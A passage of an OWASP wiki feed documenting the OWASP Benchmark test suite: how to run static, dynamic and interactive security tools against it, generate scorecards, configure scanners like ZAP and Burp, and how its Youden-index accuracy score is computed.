Generating Test Results for PMD:&lt;br /&gt;
&lt;br /&gt;
 $ ./scripts/runPMD.sh (Linux) or .\scripts\runPMD.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
Generating Test Results for FindBugs:&lt;br /&gt;
&lt;br /&gt;
 $ ./scripts/runFindBugs.sh (Linux) or .\scripts\runFindBugs.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
Generating Test Results for FindBugs with the FindSecBugs plugin:&lt;br /&gt;
&lt;br /&gt;
 $ ./scripts/runFindSecBugs.sh (Linux) or .\scripts\runFindSecBugs.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
In each case, the script will generate a results file and put it in the /results directory. For example: &lt;br /&gt;
&lt;br /&gt;
 Benchmark_1.2-findbugs-v3.0.1-1026.xml&lt;br /&gt;
&lt;br /&gt;
This results file name is carefully constructed to mean the following: It's a results file against the OWASP Benchmark version 1.2, FindBugs was the analysis tool, it was version 3.0.1 of FindBugs, and it took 1026 seconds to run the analysis.&lt;br /&gt;
&lt;br /&gt;
NOTE: If you create a results file yourself, by running a commercial tool for example, you can add the version # and the compute time to the filename just like this and the Benchmark Scorecard generator will pick this information up and include it in the generated scorecard. If you don't, depending on what metadata is included in the tool results, the Scorecard generator might do this automatically anyway.&lt;br /&gt;
&lt;br /&gt;
==Generating Scorecards==&lt;br /&gt;
The scorecard generation application BenchmarkScore is included with the Benchmark. It parses the output files generated by any of the supported security tools run against the Benchmark and compares them against the expected results, and produces a set of web pages that detail the accuracy and speed of the tools involved. For the list of currently supported tools, check out the: Tools Support/Results tab. If you are using a tool that is not yet supported, simply send us a results file from that tool and we'll write a parser for that tool and add it to the supported tools list.&lt;br /&gt;
&lt;br /&gt;
The following command will compute a Benchmark scorecard for all the results files in the '''/results''' directory. The generated scorecard is put into the '''/scorecard''' directory.&lt;br /&gt;
&lt;br /&gt;
 createScorecard.sh (Linux) or createScorecard.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
An example of a real scorecard for some open source tools is provided at the top of the Tool Support/Results tab so you can see what one looks like.&lt;br /&gt;
&lt;br /&gt;
We recommend including the Benchmark version number in any results file name, in order to help prevent mismatches between the expected results and the actual results files.  A tool will not score well against the wrong expected results.&lt;br /&gt;
&lt;br /&gt;
===Customizing Your Scorecard Generation===&lt;br /&gt;
&lt;br /&gt;
The createScorecard scripts are very simple. They only have one line. Here's what the 1.2 version looks like:&lt;br /&gt;
&lt;br /&gt;
 mvn validate -Pbenchmarkscore -Dexec.args=&amp;quot;expectedresults-1.2.csv results&amp;quot;&lt;br /&gt;
&lt;br /&gt;
This Maven command simply says to run the BenchmarkScore application, passing in two parameters. The 1st is the Benchmark expected results file to compare the tool results against. And the 2nd is the name of the directory that contains all the results from tools run against that version of the Benchmark. If you have tool results older than the current version of the Benchmark, like 1.1 results for example, then you would do something like this instead:&lt;br /&gt;
&lt;br /&gt;
 mvn validate -Pbenchmarkscore -Dexec.args=&amp;quot;expectedresults-1.1.csv 1.1_results&amp;quot;&lt;br /&gt;
&lt;br /&gt;
To keep things organized, we actually put the expected results file inside the same results folder for that version of the Benchmark, so our command looks like this:&lt;br /&gt;
&lt;br /&gt;
 mvn validate -Pbenchmarkscore -Dexec.args=&amp;quot;1.1_results/expectedresults-1.1.csv 1.1_results&amp;quot;&lt;br /&gt;
&lt;br /&gt;
In all cases, the generated scorecard is put in the /scorecard folder.&lt;br /&gt;
&lt;br /&gt;
'''WARNING: If you generate results for a commercial tool, be careful who you distribute it to. Each tool has its own license defining when any results it produces can be released/made public. It is likely to be against the terms of a commercial tool's license to publicly release that tool's score against the OWASP Benchmark. The OWASP Benchmark project takes no responsibility if someone else releases such results.''' It is for just this reason that the Benchmark project isn't releasing such results itself.&lt;br /&gt;
&lt;br /&gt;
= Tool Scanning Tips =&lt;br /&gt;
&lt;br /&gt;
People frequently have difficulty scanning the Benchmark with various tools due to many reasons, including size of the Benchmark app and its codebase, and complexity of the tools used. Here is some guidance for some of the tools we have used to scan the Benchmark. If you've learned any tricks on how to get better or easier results for a particular tool against the Benchmark, let us know or update this page directly.&lt;br /&gt;
&lt;br /&gt;
== Generic Tips ==&lt;br /&gt;
&lt;br /&gt;
Because of the size of the Benchmark, you may need to give your tool more memory before it starts the scan. If its a Java based tool, you may want to pass more memory to it like this:&lt;br /&gt;
&lt;br /&gt;
 -Xmx4G (This gives the Java application 4 Gig of memory)&lt;br /&gt;
&lt;br /&gt;
== SAST Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Checkmarx ===&lt;br /&gt;
&lt;br /&gt;
The Checkmarx SAST Tool (CxSAST) is ready to scan the OWASP Benchmark out-of-the-box. &lt;br /&gt;
Please notice that the OWASP Benchmark “hides” some vulnerabilities in dead code areas, for example:&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
if (0&amp;gt;1)&lt;br /&gt;
{&lt;br /&gt;
  //vulnerable code&lt;br /&gt;
}&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
By default, CxSAST will find these vulnerabilities since Checkmarx believes that including dead code in the scan results is a SAST best practice. &lt;br /&gt;
&lt;br /&gt;
Checkmarx's experience shows that security experts expect to find these types of code vulnerabilities, and demand that their developers fix them. However, OWASP Benchmark considers the flagging of these vulnerabilities as False Positives, as a result lowering Checkmarx's overall score. &lt;br /&gt;
&lt;br /&gt;
Therefore, in order to receive an OWASP score untainted by dead code, re-configure CxSAST as follows:&lt;br /&gt;
# Open the CxAudit client for editing Java queries.&lt;br /&gt;
# Override the &amp;quot;Find_Dead_Code&amp;quot; query.&lt;br /&gt;
# Add the commented text of the original query to the new override query.&lt;br /&gt;
# Save the queries.&lt;br /&gt;
&lt;br /&gt;
=== FindBugs ===&lt;br /&gt;
&lt;br /&gt;
We include this free tool in the Benchmark and its all dialed in. Simply run the script: ./script/runFindBugs.(sh or bat). If you want to run a different version of FindBugs, just change its version number in the Benchmark pom.xml file.&lt;br /&gt;
&lt;br /&gt;
=== FindBugs with FindSecBugs ===&lt;br /&gt;
&lt;br /&gt;
[http://h3xstream.github.io/find-sec-bugs/ FindSecurityBugs] is a great plugin for FindBugs that significantly increases the ability for FindBugs to find security issues. We include this free tool in the Benchmark and its all dialed in. Simply run the script: ./script/runFindSecBugs.(sh or bat). If you want to run a different version of FindSecBugs, just change the version number of the findsecbugs-plugin artifact in the Benchmark pom.xml file.&lt;br /&gt;
&lt;br /&gt;
=== HP Fortify ===&lt;br /&gt;
&lt;br /&gt;
If you are using the Audit Workbench, you can give it more memory and make sure you invoke it in 64-bit mode by doing this:&lt;br /&gt;
&lt;br /&gt;
  set AWB_VM_OPTS=&amp;quot;-Xmx2G -XX:MaxPermSize=256m&amp;quot;&lt;br /&gt;
  export AWB_VM_OPTS=&amp;quot;-Xmx2G -XX:MaxPermSize=256m&amp;quot;&lt;br /&gt;
  auditworkbench -64&lt;br /&gt;
&lt;br /&gt;
We found it was easier to use the Maven support in Fortify to scan the Benchmark and to do it in 2 phases, translate, and then scan. We did something like this:&lt;br /&gt;
&lt;br /&gt;
  Translate Phase:&lt;br /&gt;
  export JAVA_HOME=$(/usr/libexec/java_home)&lt;br /&gt;
  export PATH=$PATH:/Applications/HP_Fortify/HP_Fortify_SCA_and_Apps_4.10/bin&lt;br /&gt;
  export SCA_VM_OPTS=&amp;quot;-Xmx2G -version 1.7&amp;quot;&lt;br /&gt;
  mvn sca:clean&lt;br /&gt;
  mvn sca:translate&lt;br /&gt;
&lt;br /&gt;
  Scan Phase:&lt;br /&gt;
  export JAVA_HOME=$(/usr/libexec/java_home)&lt;br /&gt;
  export PATH=$PATH:/Applications/HP_Fortify/HP_Fortify_SCA_and_Apps_4.10/bin&lt;br /&gt;
  export SCA_VM_OPTS=&amp;quot;-Xmx10G -version 1.7&amp;quot;&lt;br /&gt;
  mvn sca:scan&lt;br /&gt;
&lt;br /&gt;
=== PMD ===&lt;br /&gt;
&lt;br /&gt;
We include this free tool in the Benchmark and its all dialed in. Simply run the script: ./script/runPMD.(sh or bat). If you want to run a different version of PMD, just change its version number in the Benchmark pom.xml file. (NOTE: PMD doesn't find any security issues. We include it because its interesting to know that it doesn't.)&lt;br /&gt;
&lt;br /&gt;
=== SonarQube ===&lt;br /&gt;
&lt;br /&gt;
We include this free tool in the Benchmark and its mostly dialed in.  But its a bit tricky because SonarQube requires two parts. There is a stand alone scanner for Java. And then there is a web application that accepts the results, and in turn can then produce the results file required by the Benchmark scorecard generator for SonarQube. Running the script runSonarQube.(sh or bat) will generate the results, but if the SonarQube Web Application isn't running where the runSonarQube script expects it to be, then the script will fail.&lt;br /&gt;
&lt;br /&gt;
If you want to run a different version of SonarQube, just change its version number in the Benchmark pom.xml file.&lt;br /&gt;
&lt;br /&gt;
=== Xanitizer ===&lt;br /&gt;
&lt;br /&gt;
The vendor has written their own guide to [http://www.rigs-it.net/opendownloads/whitepapers/HowToSetUpXanitizerForOWASPBenchmarkProject.pdf How to Set Up Xanitizer for OWASP Benchmark].&lt;br /&gt;
&lt;br /&gt;
== DAST Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Burp Pro ===&lt;br /&gt;
&lt;br /&gt;
You must use Burp Pro v1.6.29 or greater to scan the Benchmark due to a previous limitation in Burp Pro related to ensuring the path attribute for cookies was honored. This issue was fixed in the v1.6.29 release.&lt;br /&gt;
&lt;br /&gt;
To scan, first spider the entire Benchmark, and then select the /Benchmark URL and actively scan that branch. You can skip all the .html pages and any other pages that Burp says have no parameters.&lt;br /&gt;
&lt;br /&gt;
NOTE: We have been unable to simply run Burp Pro against the entire Benchmark in one shot. In our experience, it eventually freezes/stops scanning. We've had to run it against each test area one at a time. If you figure out how to get Burp Pro to scan all of Benchmark in one shot, let us know how you did it!&lt;br /&gt;
&lt;br /&gt;
=== OWASP ZAP ===&lt;br /&gt;
&lt;br /&gt;
ZAP may require additional memory to be able to scan the Benchmark. To configure the amount of memory:&lt;br /&gt;
* Tools --&amp;gt; Options --&amp;gt; JVM: Recommend setting to: -Xmx2048m (or larger). (Then restart ZAP).&lt;br /&gt;
&lt;br /&gt;
To run ZAP against Benchmark:&lt;br /&gt;
# Click on Show All Tabs button (if spider tab isn't visible)&lt;br /&gt;
# Go to Spider tab (the black spider) and click on New Scan button&lt;br /&gt;
# Enter: https://localhost:8443/benchmark/  into the 'Starting Point' box and hit 'Start Scan'&lt;br /&gt;
# When Spider completes, click on 'benchmark' folder in Site Map, right click and select: 'Attack --&amp;gt; Active Scan'&lt;br /&gt;
#* It will take several hours, like 3+ to complete (it's actually likely to simply freeze before completing the scan - see NOTE: below)&lt;br /&gt;
&lt;br /&gt;
For faster active scan you can&lt;br /&gt;
* Disable the ZAP DB log.&lt;br /&gt;
**  In ZAP 2.5.0+ you can:&lt;br /&gt;
*** Disable it via Options / Database / Recover Log&lt;br /&gt;
*** Set it on the command line using &amp;quot;-config database.recoverylog=false&amp;quot;&lt;br /&gt;
** In ZAP prior to 2.5.0, you need to edit the file zapdb.script (in &amp;quot;db&amp;quot; directory) and change the line:&lt;br /&gt;
*** SET FILES LOG TRUE    to:   SET FILES LOG FALSE&lt;br /&gt;
* Disable unnecessary plugins / Technologies: When you launch the Active Scan&lt;br /&gt;
** On the Policy tab, disable all plugins except: XSS (Reflected), Path Traversal, SQLi, OS Command Injection&lt;br /&gt;
** Go the Technology Tab, disable everything and only enable: MySQL, YOUR_OS, Tomcat&lt;br /&gt;
** Note: This 2nd performance improvement step is a bit like cheating as you wouldn't do this for a normal site scan. You'd want to leave all this on in case these other plugins/technologies are helpful in finding more issues. So a fair performance comparison of ZAP to other tools would leave all this one.&lt;br /&gt;
&lt;br /&gt;
To generate the ZAP XML results file so you can generate its scorecard:&lt;br /&gt;
* Tools &amp;gt; Options &amp;gt; Alerts - And set the Max alert instances to like 500.&lt;br /&gt;
* Then: Report &amp;gt; Generate XML Report...&lt;br /&gt;
&lt;br /&gt;
NOTE: Similar to Burp, we can't simply run ZAP against the entire Benchmark in one shot. In our experience, it eventually freezes/stops scanning. We've had to run it against each test area one at a time. If you figure out how to get ZAP to scan all of Benchmark in one shot, let us know how you did it!&lt;br /&gt;
&lt;br /&gt;
Things we tried that didn't improve the score:&lt;br /&gt;
* AJAX Spider - the traditional spider appears to find all (or 99%) of the test cases so the AJAX Spider does not appear to be needed against Benchmark v1.2&lt;br /&gt;
* XSS (Persistent) - There are 3 of these plugins that run by default. There aren't any stored XSS in Benchmark, so you can disable these plugins for a faster scan.&lt;br /&gt;
* DOM XSS Plugin - This is an optional plugin that didn't seem to find any additional XSS issues. There aren't an DOM specific XSS issues in Benchmark v1.2, so not surprising.&lt;br /&gt;
&lt;br /&gt;
== IAST Tools ==&lt;br /&gt;
&lt;br /&gt;
Interactive Application Security Testing (IAST) tools work differently than scanners.  IAST tools monitor an application as it runs to identify application vulnerabilities using context from inside the running application. Typically these tools run continuously, immediately notifying users of vulnerabilities, but you can also get a full report of an entire application. To do this, we simply run the Benchmark application with an IAST agent and use a crawler to hit all the pages.&lt;br /&gt;
&lt;br /&gt;
=== Contrast ===&lt;br /&gt;
&lt;br /&gt;
To use Contrast, we simply add the agent to the Benchmark environment and run the BenchmarkCrawler. The entire process should only take a few minutes. We provided a few scripts, which simply add the -javaagent:contrast.jar flag to the Benchmark launch configuration. We have tested on MacOS, Ubuntu, and Windows.  Be sure your VM has at least 4M of memory.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Ensure your environment has Java, Maven, and git installed, then build the Benchmark project&lt;br /&gt;
   '''$ git clone https://github.com/OWASP/Benchmark.git'''&lt;br /&gt;
   '''$ cd Benchmark'''&lt;br /&gt;
   '''$ mvn compile'''&lt;br /&gt;
&lt;br /&gt;
* Download a licensed copy of the Contrast Agent (contrast.jar) from your Contrast TeamServer account and put it in the /Benchmark/tools/Contrast directory.&lt;br /&gt;
   '''$ cp ~/Downloads/contrast.jar tools/Contrast'''&lt;br /&gt;
&lt;br /&gt;
* In Terminal 1, launch the Benchmark application and wait until it starts&lt;br /&gt;
   '''$  ./runBenchmark_wContrast.sh''' (.bat on Windows)&lt;br /&gt;
   '''[INFO] Scanning for projects...&lt;br /&gt;
   '''[INFO]                                                                         &lt;br /&gt;
   '''[INFO] ------------------------------------------------------------------------&lt;br /&gt;
   '''[INFO] Building OWASP Benchmark Project 1.2&lt;br /&gt;
   '''[INFO] ------------------------------------------------------------------------&lt;br /&gt;
   '''[INFO] &lt;br /&gt;
   '''...&lt;br /&gt;
   '''[INFO] [talledLocalContainer] Tomcat 8.x started on port [8443]'''&lt;br /&gt;
   '''[INFO] Press Ctrl-C to stop the container...'''&lt;br /&gt;
&lt;br /&gt;
* In Terminal 2, launch the crawler and wait a minute or two for the crawl to complete.&lt;br /&gt;
   '''$ ./runCrawler.sh''' (.bat on Windows)&lt;br /&gt;
&lt;br /&gt;
* A Contrast report has been generated in /Benchmark/tools/Contrast/working/contrast.log.  This report will be automatically copied (and renamed with version number)  to /Benchmark/results directory.&lt;br /&gt;
   '''$ more tools/Contrast/working/contrast.log'''&lt;br /&gt;
   '''2016-04-22 12:29:29,716 [main b] INFO - Contrast Runtime Engine&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - Copyright (C) 2012&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - Pat. 8,458,789 B2&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - Contrast Security, Inc.&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - All Rights Reserved&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - https://www.contrastsecurity.com/&lt;br /&gt;
   '''...'''&lt;br /&gt;
&lt;br /&gt;
* Press Ctrl-C to stop the Benchmark in Terminal 1.  Note: on Windows, select &amp;quot;N&amp;quot; when asked Terminate batch job (Y/N))&lt;br /&gt;
   '''[INFO] [talledLocalContainer] Tomcat 8.x is stopped'''&lt;br /&gt;
   '''Copying Contrast report to results directory'''&lt;br /&gt;
&lt;br /&gt;
* Generate scorecards in /Benchmark/scorecard&lt;br /&gt;
   '''$ ./createScorecards.sh''' (.bat on Windows)&lt;br /&gt;
   '''Analyzing results from Benchmark_1.2-Contrast.log&lt;br /&gt;
   '''Actual results file generated: /Users/owasp/Projects/Benchmark/scorecard/Benchmark_v1.2_Scorecard_for_Contrast.csv&lt;br /&gt;
   '''Report written to: /Users/owasp/Projects/Benchmark/scorecard/Benchmark_v1.2_Scorecard_for_Contrast.html&lt;br /&gt;
&lt;br /&gt;
* Open the Benchmark Scorecard in your browser&lt;br /&gt;
   '''/Users/owasp/Projects/Benchmark/scorecard/Benchmark_v1.2_Scorecard_for_Contrast.html'''&lt;br /&gt;
&lt;br /&gt;
= RoadMap =&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.0 - Released April 15, 2015 - This initial release included over 20,000 test cases in 11 different vulnerability categories. As this initial version was not a runnable application, it was only suitable for assessing static analysis tools (SAST).&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.1 - Released May 23, 2015 - This update fixed some inaccurate test cases, and made sure that every vulnerability area included both True Positives and False Positives.&lt;br /&gt;
&lt;br /&gt;
Benchmark Scorecard Generator - Released July 10, 2015 - The ability to automatically and repeatably produce a scorecard of how well tools do against the Benchmark was released for most of the SAST tools supported by the Benchmark. Scorecards present graphical as well as statistical data on how well a tool does against the Benchmark down to the level of detail of how exactly it did against each individual test in the Benchmark. [https://rawgit.com/OWASP/Benchmark/master/scorecard/OWASP_Benchmark_Home.html Here are the latest public scorecards].  Support for producing scorecards for additional tools is being added all the time and the current full set is documented on the '''Tool Support/Results''' and '''Quick Start''' tabs of this wiki.&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.2beta - Released Aug 15, 2015 - The 1st release of a fully runnable version of the Benchmark to support assessing all types of vulnerability detection and prevention technologies, including DAST, IAST, RASP, WAFs, etc. This involved creating a user interface for every test case, and enhancing each test case to make sure its actually exploitable, not just uses something that is theoretically weak. This release is under 3,000 test cases to make it practical to scan the entire Benchmark with a DAST tool in a reasonable amount of time, with commodity hardware specs.&lt;br /&gt;
&lt;br /&gt;
Benchmark 1.2 - Released June 5, 2016 -  Based on feedback from a number of DAST tool developers, and other vendors as well, we made the Benchmark more realistic in a number of ways to facilitate external DAST scanning, and also made the Benchmark more resilient against attack so it could properly survive various DAST vulnerability detection and exploit verification techniques.&lt;br /&gt;
&lt;br /&gt;
Plans for Benchmark 1.3:&lt;br /&gt;
&lt;br /&gt;
While we don't have hard and fast rules of exactly what we are going to do next, enhancements in the following areas are planned for the next release:&lt;br /&gt;
&lt;br /&gt;
* Add new vulnerability categories (e.g., Hibernate Injection)&lt;br /&gt;
* Add support for popular server side Java frameworks (e.g., Spring)&lt;br /&gt;
* Add web services test cases&lt;br /&gt;
&lt;br /&gt;
We are also starting to work on the ability to score WAFs/RASPs and other defensive technology against Benchmark.&lt;br /&gt;
&lt;br /&gt;
= FAQ =&lt;br /&gt;
&lt;br /&gt;
==1. How are the scores computed for the Benchmark?==&lt;br /&gt;
&lt;br /&gt;
Each test case has a single vulnerability of a specific type. Its either a real vulnerability (True Positive) or not (a False Positive). We document all the test cases for each version of the Benchmark in the expectedresults-VERSION#.csv file (e.g., expectedresults-1.1.csv). This file lists the test case name, the CWE type of the vulnerability, and whether it is a True Positive or not. The Benchmark supports scorecard generators for computing exactly how a tool did when analyzing a version of the Benchmark. The full list of supported tools is on the Tools Support/Results tab. For each tool there is a parser that can parse the native results format for that tool (usually XML). This parser simply, for each test case, looks to see if that tool reported a vulnerability of the type expected in the test case source code file (for SAST) or the test case URL (for DAST/IAST). If it did, and the test case was a True Positive, the tool gets credit for finding it. If it is a False Positive test, and the tool reports that type of finding, then its recorded as a False Positive. If the tool didn't report that type of vulnerability for a test case, then they get either a False Negative, or a True Negative as appropriate. After calculating all of the individual test case results, a scorecard is generated providing a chart and statistics for that tool across all the vulnerability categories, and pages are also created comparing different tools to each other in each vulnerability category (if multiple tools are being scored together).&lt;br /&gt;
&lt;br /&gt;
A detailed file explaining exactly how that tool did against each individual test case in that version of the Benchmark is produced as part of scorecard generation, and is available via the Actual Results link on each tool's scorecard page. (e.g., Benchmark_v1.1_Scorecard_for_FindBugs.csv).&lt;br /&gt;
&lt;br /&gt;
==2. What if the tool I'm using doesn't have a scorecard generator for it?==&lt;br /&gt;
&lt;br /&gt;
Send us the results file! We'll be happy to create a parser for that tool so its now supported.&lt;br /&gt;
&lt;br /&gt;
==3. What if a tool finds other unexpected vulnerabilities?==&lt;br /&gt;
&lt;br /&gt;
We are sure there are vulnerabilities we didn't intend to be there and we are eliminating them as we find them. If you find some, let us know and we'll fix them too. We are primarily focused on unintentional vulnerabilities in the categories of vulnerabilities the Benchmark currently supports, since that is what is actually measured.&lt;br /&gt;
&lt;br /&gt;
Right now, two types of vulnerabilities that get reported are ignored by the scorecard generator:&lt;br /&gt;
# Vulnerabilities in categories not yet supported&lt;br /&gt;
# Vulnerabilities of a type that is supported, but reported in test cases not of that type&lt;br /&gt;
&lt;br /&gt;
In the case of #2, false positives reported in unexpected areas are also ignored, which is primarily a DAST problem. Right now those false positives are completely ignored, but we are thinking about including them in the false positive score in some fashion. We just haven't decided how yet.&lt;br /&gt;
&lt;br /&gt;
==4. How should I configure my tool to scan the Benchmark?==&lt;br /&gt;
&lt;br /&gt;
All tools support various levels of configuration in order to improve their results. The Benchmark project, in general, is trying to '''compare out of the box capabilities of tools'''. However, if a few simple tweaks to a tool can be done to improve that tool's score, that's fine. We'd like to understand what those simple tweaks are, and document them here, so others can repeat those tests in exactly the same way. For example, just turn on the 'test cookies and headers' flag, which is off by default. Or turn on the 'advanced' scan, so it will work harder, find more vulnerabilities. Its simple things like this we are talking about, not an extensive effort to teach the tool about the app, or perform 'expert' configuration of the tool.&lt;br /&gt;
&lt;br /&gt;
So, if you know of some simple tweaks to improve a tool's results, let us know what they are and we'll document them here so everyone can benefit and make it easier to do apples to apples comparisons. And we'll link to that guidance once we start documenting it, but we don't have any such guidance right now.&lt;br /&gt;
&lt;br /&gt;
==5. I'm having difficulty scanning the Benchmark with a DAST tool. How can I get it to work?==&lt;br /&gt;
&lt;br /&gt;
We've run into 2 primary issues giving DAST tools problems.&lt;br /&gt;
&lt;br /&gt;
a) The Benchmark Generates Lots of Cookies&lt;br /&gt;
&lt;br /&gt;
The Burp team pointed out a cookies bug in the 1.2beta Benchmark. Each Weak Randomness test case generates its own cookie, 1 per test case. This caused the creation of so many cookies that servers would eventually start returning 400 errors because there were simply too many cookies being submitted in a request. This was fixed in the Aug 27, 2015 update to the Benchmark by setting the path attribute for each of these cookies to be the path to that individual test case. Now, only at most one of these cookies should be submitted with each request, eliminating this 'too many cookies' problem. However, if a DAST tool doesn't honor this path attribute, it may continue to send too many cookies, making the Benchmark unscannable for that tool. Burp Pro prior to 1.6.29 had this issue, but it was fixed in the 1.6.29 release.&lt;br /&gt;
&lt;br /&gt;
b) The Benchmark is a BIG Application&lt;br /&gt;
&lt;br /&gt;
Yes. It is, so you might have to give your scanner more memory than it normally uses by default in order to successfully scan the entire Benchmark. Please consult your tool vendor's documentation on how to give it more memory.&lt;br /&gt;
&lt;br /&gt;
Your machine itself might not have enough memory in the first place. For example, we were not able to successfully scan the 1.2beta with OWASP ZAP with only 8 Gig of RAM. So, you might need a more powerful machine or use a cloud provided machine to successfully scan the Benchmark with certain DAST tools. You may have similar problems with SAST tools against large versions of the Benchmark, like the 1.1 release.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
The following people, organizations, and many others, have contributed to this project and their contributions are much appreciated!&lt;br /&gt;
&lt;br /&gt;
* Lots of Vendors - Many vendors have provided us with either trial licenses we can use, or they have run their tools themselves and either sent us results files, or written and contributed scorecard generators for their tool. Many have also provided valuable feedback so we can make the Benchmark more accurate and more realistic.&lt;br /&gt;
* Juan Gama - Development of initial release and continued support&lt;br /&gt;
* Ken Prole - Assistance with automated scorecard development using CodeDx&lt;br /&gt;
* Nick Sanidas - Development of initial release&lt;br /&gt;
* Denim Group - Contribution of scan results to facilitate scorecard development&lt;br /&gt;
* Tasos Laskos - Significant feedback on the DAST version of the Benchmark&lt;br /&gt;
* Ann Campbell - From SonarSource - for fixing our SonarQube results parser&lt;br /&gt;
* Dhiraj Mishra - OWASP Member - contributed SQLi/XSS fuzz vectors as initial contribution towards adding support for WAF/RASP scoring&lt;br /&gt;
&lt;br /&gt;
[[File:CWE_Logo.jpeg|link=https://cwe.mitre.org/]] - The CWE project for providing a mapping mechanism to easily map test cases to issues found by vulnerability detection tools.&lt;br /&gt;
&lt;br /&gt;
We are looking for volunteers. Please contact [mailto:dave.wichers@owasp.org Dave Wichers] if you are interested in contributing new test cases, tool results run against the benchmark, or anything else.&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Benchmark&amp;diff=231712</id>
		<title>Benchmark</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Benchmark&amp;diff=231712"/>
				<updated>2017-07-16T15:05:07Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: /* SAST Tools */ Added Checkmarx tips&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Main = &lt;br /&gt;
 &amp;lt;div style=&amp;quot;width:100%;height:100px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Benchmark Project  ==&lt;br /&gt;
The OWASP Benchmark for Security Automation (OWASP Benchmark) is a free and open test suite designed to evaluate the speed, coverage, and accuracy of automated software vulnerability detection tools and services (henceforth simply referred to as 'tools'). Without the ability to measure these tools, it is difficult to understand their strengths and weaknesses, and compare them to each other. Each version of the OWASP Benchmark contains thousands of test cases that are fully runnable and exploitable, each of which maps to the appropriate CWE number for that vulnerability.&lt;br /&gt;
&lt;br /&gt;
You can use the OWASP Benchmark with [[Source_Code_Analysis_Tools | Static Application Security Testing (SAST)]] tools, [[:Category:Vulnerability_Scanning_Tools | Dynamic Application Security Testing (DAST)]] tools like OWASP [[ZAP]] and Interactive Application Security Testing (IAST) tools. The current version of the Benchmark is implemented in Java.  Future versions may expand to include other languages.&lt;br /&gt;
&lt;br /&gt;
==Benchmark Project Scoring Philosophy==&lt;br /&gt;
&lt;br /&gt;
Security tools (SAST, DAST, and IAST) are amazing when they find a complex vulnerability in your code.  But with widespread misunderstanding of the specific vulnerabilities automated tools cover, end users are often left with a false sense of security.&lt;br /&gt;
&lt;br /&gt;
We are on a quest to measure just how good these tools are at discovering and properly diagnosing security problems in applications. We rely on the [http://en.wikipedia.org/wiki/Receiver_operating_characteristic long history] of military and medical evaluation of detection technology as a foundation for our research. Therefore, the test suite tests both real and fake vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
There are four possible test outcomes in the Benchmark:&lt;br /&gt;
&lt;br /&gt;
# Tool correctly identifies a real vulnerability (True Positive - TP)&lt;br /&gt;
# Tool fails to identify a real vulnerability (False Negative - FN)&lt;br /&gt;
# Tool correctly ignores a false alarm (True Negative - TN)&lt;br /&gt;
# Tool fails to ignore a false alarm (False Positive - FP)&lt;br /&gt;
&lt;br /&gt;
We can learn a lot about a tool from these four metrics. Consider a tool that simply flags every line of code as vulnerable. This tool will perfectly identify all vulnerabilities!  But it will also have 100% false positives and thus adds no value.  Similarly, consider a tool that reports absolutely nothing. This tool will have zero false positives, but will also identify zero real vulnerabilities and is also worthless. You can even imagine a tool that flips a coin to decide whether to report whether each test case contains a vulnerability. The result would be 50% true positives and 50% false positives.  We need a way to distinguish valuable security tools from these trivial ones.&lt;br /&gt;
&lt;br /&gt;
If you imagine the line that connects all these points, from 0,0 to 100,100 establishes a line that roughly translates to &amp;quot;random guessing.&amp;quot; The ultimate measure of a security tool is how much better it can do than this line.  The diagram below shows how we will evaluate security tools against the Benchmark.&lt;br /&gt;
&lt;br /&gt;
[[File:Wbe guide.png]]&lt;br /&gt;
&lt;br /&gt;
A point plotted on this chart provides a visual indication of how well a tool did considering both the True Positives the tool reported, as well as the False Positives it reported. We also want to compute an individual score for that point in the range 0 - 100, which we call the Benchmark Accuracy Score.&lt;br /&gt;
&lt;br /&gt;
The Benchmark Accuracy Score is essentially a [https://en.wikipedia.org/wiki/Youden%27s_J_statistic Youden Index], which is a standard way of summarizing the accuracy of a set of tests.  Youden's index is one of the oldest measures for diagnostic accuracy. It is also a global measure of a test performance, used for the evaluation of overall discriminative power of a diagnostic procedure and for comparison of this test with other tests. Youden's index is calculated by deducting 1 from the sum of a test’s sensitivity and specificity expressed not as percentage but as a part of a whole number: (sensitivity + specificity) – 1. For a test with poor diagnostic accuracy, Youden's index equals 0, and in a perfect test Youden's index equals 1.&lt;br /&gt;
&lt;br /&gt;
  So for example, if a tool has a True Positive Rate (TPR) of .98 (i.e., 98%) &lt;br /&gt;
    and False Positive Rate (FPR) of .05 (i.e., 5%)&lt;br /&gt;
  Sensitivity = TPR (.98)&lt;br /&gt;
  Specificity = 1-FPR (.95)&lt;br /&gt;
  So the Youden Index is (.98+.95) - 1 = .93&lt;br /&gt;
  &lt;br /&gt;
